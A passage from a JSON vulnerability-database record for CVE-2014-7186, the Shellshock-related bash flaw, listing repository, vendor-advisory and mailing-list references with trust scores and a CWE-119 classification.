0.1, "url": "https://github.com/jdauphant/patch-bash-shellshock " }, { "title": "linux-pentest", "trust": 0.1, "url": "https://github.com/ankh2054/linux-pentest " }, { "title": "w-test", "trust": 0.1, "url": "https://github.com/inspirion87/w-test " }, { "title": "shocktrooper", "trust": 0.1, "url": "https://github.com/evank/shocktrooper " }, { "title": "ShellShockHunter", "trust": 0.1, "url": "https://github.com/mrcl0wnlab/shellshockhunter " }, { "title": "shellshockFixOSX", "trust": 0.1, "url": "https://github.com/opragel/shellshockfixosx " }, { "title": "Xpl-SHELLSHOCK-Ch3ck", "trust": 0.1, "url": "https://github.com/googleinurl/xpl-shellshock-ch3ck " }, { "title": "bashcheck", "trust": 0.1, "url": "https://github.com/hannob/bashcheck " }, { "title": "shellshocker-pocs", "trust": 0.1, "url": "https://github.com/mubix/shellshocker-pocs " }, { "title": "Threatpost", "trust": 0.1, "url": "https://threatpost.com/researcher-takes-wraps-off-two-undisclosed-shellshock-vulnerabilities-in-bash/108674/" }, { "title": "The Register", "trust": 0.1, "url": "https://www.theregister.co.uk/2014/10/02/vmware_virtually_in_control_of_shellshock/" }, { "title": "Threatpost", "trust": 0.1, "url": "https://threatpost.com/vmware-begins-to-patch-bash-issues-across-product-line/108632/" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-7186" }, { "db": "CNNVD", "id": "CNNVD-201409-1072" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2014-7186" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.2, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20140926-bash" }, { "trust": 2.2, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10085" }, { "trust": 1.9, "url": "https://kb.bluecoat.com/index?page=content\u0026id=sa82" }, { "trust": 1.9, "url": "https://support.f5.com/kb/en-us/solutions/public/15000/600/sol15629.html" }, { "trust": 1.7, "url": "http://openwall.com/lists/oss-security/2014/09/25/32" }, { "trust": 1.7, "url": "http://openwall.com/lists/oss-security/2014/09/26/2" }, { "trust": 1.7, "url": "http://openwall.com/lists/oss-security/2014/09/28/10" }, { "trust": 1.6, "url": "https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/" }, { "trust": 1.4, "url": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00044.html" }, { "trust": 1.4, "url": "http://rhn.redhat.com/errata/rhsa-2014-1311.html" }, { "trust": 1.4, "url": "http://rhn.redhat.com/errata/rhsa-2014-1312.html" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685749" }, { "trust": 1.4, "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10648" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685914" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021272" }, { "trust": 1.4, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0010.html" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/bashcve-2014-7169-2317675.html" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686084" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004898" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021279" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004897" }, { "trust": 1.4, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096315" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004915" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685604" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686131" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686246" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-7186" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-7187" }, { "trust": 1.2, "url": "http://www.ubuntu.com/usn/usn-2364-1" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2014-1354.html" }, { "trust": 1.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6277" }, { "trust": 1.1, "url": "https://www.suse.com/support/shellshock/" }, { "trust": 1.1, "url": "http://support.novell.com/security/cve/cve-2014-7186.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61479" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61641" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61618" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61622" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61636" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00041.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00038.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00042.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00048.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61485" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59907" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61654" }, { "trust": 1.1, "url": "http://packetstormsecurity.com/files/128567/ca-technologies-gnu-bash-shellshock.html" }, { "trust": 1.1, "url": "http://www.novell.com/support/kb/doc.php?id=7015721" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61565" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61643" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61503" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61711" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61633" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61552" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61703" }, { "trust": 1.1, "url": "http://seclists.org/fulldisclosure/2014/oct/0" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61283" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61603" }, { "trust": 1.1, "url": "http://packetstormsecurity.com/files/128517/vmware-security-advisory-2014-0010.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141330468527613\u0026w=2" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61188" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141345648114150\u0026w=2" }, { "trust": 1.1, "url": "https://support.citrix.com/article/ctx200217" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004879" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60034" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61816" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61128" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61313" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685733" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61442" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61287" }, { "trust": 1.1, "url": "https://support.citrix.com/article/ctx200223" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60055" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61129" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61780" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686479" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685541" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61471" }, { "trust": 1.1, "url": "http://secunia.com/advisories/58200" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61328" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60193" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61065" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61550" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61312" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686494" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60063" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61291" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60044" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686445" }, { "trust": 1.1, "url": "https://supportcenter.checkpoint.com/supportcenter/portal?eventsubmit_dogoviewsolutiondetails=\u0026solutionid=sk102673\u0026src=securityalerts" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687079" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021361" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60433" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60024" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141383304022067\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141383244821813\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141450491804793\u0026w=2" }, { "trust": 1.1, "url": "http://jvn.jp/en/jp/jvn55667175/index.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141383081521087\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141383138121313\u0026w=2" }, { "trust": 1.1, "url": "http://www.qnap.com/i/en/support/con_show.php?cid=61" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141383026420882\u0026w=2" }, { "trust": 1.1, "url": "http://jvndb.jvn.jp/jvndb/jvndb-2014-000126" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141383196021590\u0026w=2" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686447" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61873" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141577241923505\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141576728022234\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141577297623641\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141577137423233\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141585637922673\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141694386919794\u0026w=2" }, { "trust": 1.1, "url": "http://secunia.com/advisories/62343" }, { "trust": 1.1, "url": "http://secunia.com/advisories/62312" }, { "trust": 1.1, "url": "http://lists.apple.com/archives/security-announce/2015/jan/msg00003.html" }, { "trust": 1.1, "url": "http://support.apple.com/ht204244" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142358026505815\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142358078406056\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142113462216480\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142289270617409\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141879528318582\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142118135300698\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142721162228379\u0026w=2" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:164" }, { "trust": 1.1, "url": "http://lists.apple.com/archives/security-announce/2015/sep/msg00008.html" }, { "trust": 1.1, "url": "https://support.apple.com/ht205267" }, { "trust": 1.1, "url": "http://secunia.com/advisories/62228" }, { "trust": 1.1, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-c04518183" }, { "trust": 1.1, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-c04497075" }, { "trust": 1.1, "url": "http://www.securityfocus.com/archive/1/533593/100/0/threaded" }, { "trust": 1.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-7169" }, { "trust": 1.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6271" }, { "trust": 1.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6278" }, { "trust": 0.9, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.9, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.9, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.8, "url": "http://seclists.org/oss-sec/2014/q3/650" }, { "trust": 0.8, "url": "https://access.redhat.com/articles/1200223" }, { "trust": 0.8, "url": "http://seclists.org/oss-sec/2014/q3/688" }, { "trust": 0.8, "url": "http://seclists.org/oss-sec/2014/q3/685" }, { "trust": 0.8, "url": "http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html" }, { "trust": 0.8, "url": "http://lcamtuf.blogspot.com/2014/09/bash-bug-apply-unofficial-patch-now.html" }, { "trust": 0.8, "url": "https://gist.github.com/anonymous/929d622f3b36b00c0be1" }, { "trust": 0.8, "url": "https://www.dfranke.us/posts/2014-09-27-shell-shock-exploitation-vectors.html" }, { "trust": 0.8, "url": "https://shellshocker.net/#" }, { "trust": 0.8, "url": "http://support.apple.com/kb/ht6495" }, { "trust": 0.8, "url": "https://www.barracuda.com/support/techalerts" }, { "trust": 0.8, "url": "http://www.checkpoint.com/blog/protecting-shellshock/index.html" }, { "trust": 0.8, "url": "http://securityadvisories.dlink.com/security/publication.aspx?name=sap10044" }, { "trust": 0.8, "url": "https://www.debian.org/security/2014/dsa-3032" }, { "trust": 0.8, "url": "http://learn.extremenetworks.com/rs/extreme/images/vn-2014-001-%20gnu%20bash%20threats%20-cve-2014-7169%20rev01.pdf" }, { "trust": 0.8, "url": "http://fedoramagazine.org/shellshock-update-bash-packages-that-resolve-cve-2014-6271-and-cve-2014-7169-available/" }, { "trust": 0.8, "url": "http://www.fortiguard.com/advisory/fg-ir-14-030/" }, { "trust": 0.8, "url": "http://www.gentoo.org/security/en/glsa/glsa-201409-09.xml" }, { "trust": 0.8, "url": "http://alerts.hp.com/r?2.1.3kt.2zr.15ee22.l8mgqe..n.ghvs.8f9a.bw89mq%5f%5fdbosfqk0" }, { "trust": 0.8, "url": "http://kb.juniper.net/jsa10648" }, { "trust": 0.8, "url": "http://jpn.nec.com/security-info/av14-003.html" }, { "trust": 0.8, "url": "http://support.novell.com/security/cve/cve-2014-6271.html" }, { "trust": 0.8, "url": "https://www.suse.com/support/kb/doc.php?id=7015702" }, { "trust": 0.8, "url": "http://www.slackware.com/security/viewer.php?l=slackware-security\u0026y=2014\u0026m=slackware-security.522193" }, { "trust": 0.8, "url": "http://www.ubuntu.com/usn/usn-2362-1/" }, { "trust": 0.8, "url": "http://kb.vmware.com/selfservice/microsites/search.do?language=en_us\u0026cmd=displaykc\u0026externalid=2090740" }, { "trust": 0.8, "url": "http://pkgsrc.se/files.php?messageid=20140925202832.9ad9c98@cvs.netbsd.org" }, { "trust": 0.3, "url": "http://www.gnu.org/software/bash/" }, { "trust": 0.3, "url": "https://supportcenter.checkpoint.com/supportcenter/portal?eventsubmit_dogoviewsolutiondetails=\u0026solutionid=sk102673" }, { "trust": 0.3, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=kb83017" }, { "trust": 0.3, "url": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_bash" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-2303276.html" }, { "trust": 0.3, "url": "http://seclists.org/oss-sec/2014/q3/735" }, { "trust": 0.3, "url": "https://www-304.ibm.com/connections/blogs/psirt/entry/security_bulletin_vulnerabilities_in_bash_affect_certain_qlogic_products_that_ibm_resells_for_bladecenter_and_flex_system_products_cve_2014_6271_c" }, { "trust": 0.3, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-notices/archive/hw-372538.htm" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/600/sol15629.html?ref=rss" }, { "trust": 0.3, "url": "http://googlechromereleases.blogspot.com/2014/10/stable-channel-update-for-chrome-os.html" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1004932" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21686433" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg3t1021361" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21686494" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21686445" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1004903" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004928" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004911" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21686479" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04497075" }, { "trust": 0.3, "url": "http://seclists.org/fulldisclosure/2014/oct/25" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04552143" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10661\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100183172" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100183066" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100183009" }, { "trust": 0.3, "url": "https://lists.gnu.org/archive/html/bug-bash/2014-10/msg00000.html" }, { "trust": 0.3, "url": "http://www.kb.cert.org/vuls/id/bluu-9paps5" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100183222" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479398" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479402" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479492" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04475942" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04471532" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04488200" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04478866" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04477872" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479536" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04540692" }, { "trust": 0.3, "url": "http://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04561445" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04471546" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04471538" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04497042" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04512907 " }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/feb/76" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04558068" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/feb/77" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04533737" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04479974" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04487558" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04487573" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04496383" }, { "trust": 0.3, "url": "http://www.kb.cert.org/vuls/id/bluu-9paptm" }, { "trust": 0.3, "url": "http://www.kb.cert.org/vuls/id/bluu-9paptz" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/1a2e5-5116a33c2fb27/cert_security_mini-_bulletin_xrx15k_for_77xx_r15-03_v1.0.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2b8d8-513128526dd97/cert_security_mini-_bulletin_xrx15m_for_wc75xx_v1_1.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2eeef-51056e459c6d8/cert_security_mini-_bulletin_xrx15h_for_p7800_v1_0.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2a20e-5105457a515cc/cert_security_mini-_bulletin_xrx15e_for_wc57xx_v1_0.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2a901-510567b876a35/cert_security_mini-_bulletin_xrx15g_for_p6700_v1_0.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/29a7e-50e49f9c009f9/cert_security_mini_bulletin_xrx14g_for_77xx_v1.1.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/1a7a1-50f12e334b734/cert_security_mini-_bulletin_xrx14h_for_wc59xx_v1.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2df3c-51055b159fd50/cert_security_mini_bulletin_xrx15f_for_connectkey_1.5_v1-01.pdf" }, { "trust": 0.3, "url": "https://rhn.redhat.com/errata/rhsa-2014-1306.html" }, { "trust": 0.3, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/archive/hw-377648.htm" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21686447" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004982" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004879" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685873" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21686132" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096533" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21686024" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686037" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686171" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21685733" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21686098" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685875" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020272" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21685541" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004905" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685673" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21685837" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687971" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685691" }, { "trust": 0.3, "url": "http://www.kb.cert.org/vuls/id/bluu-9papw7" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004933" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096503" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004945" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100183088" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2104-6277" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2104-6278" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/119.html" }, { "trust": 0.1, "url": "https://www.securityfocus.com/bid/70152" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=35860" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2364-1/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-7186" }, { "trust": 0.1, "url": "https://www.exploit-db.com/exploits/36933/" }, { "trust": 0.1, "url": "https://www.kb.cert.org/vuls/id/252743" }, { "trust": 0.1, "url": "https://tmc.tippingpoint.com/" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/bash/4.1-2ubuntu3.4" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/bash/4.3-7ubuntu1.4" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/bash/4.2-2ubuntu2.5" }, { "trust": 0.1, "url": "https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse" }, { "trust": 0.1, "url": "https://www.ca.com" }, { "trust": 0.1, "url": "https://support.ca.com/irj/portal/anonymous/phpsbpldgpg" }, { "trust": 0.1, "url": "https://support.ca.com." }, { "trust": 0.1, "url": "http://www.hp.com/support/eslg3" }, { "trust": 0.1, "url": "https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetsea" }, { "trust": 0.1, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-7169.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-7186.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-1568.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-7187.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/ht" }, { "trust": 0.1, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-6271.html" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1568" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0287" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht201222" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0235" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8146" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0231" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8080" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2331" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1351" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8090" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9705" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1352" }, { "trust": 0.1, "url": "https://support.apple.com/en-" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-3951" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8147" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0232" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2301" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht205265." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8611" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9427" }, { "trust": 0.1, "url": "http://gpgtools.org" }, { 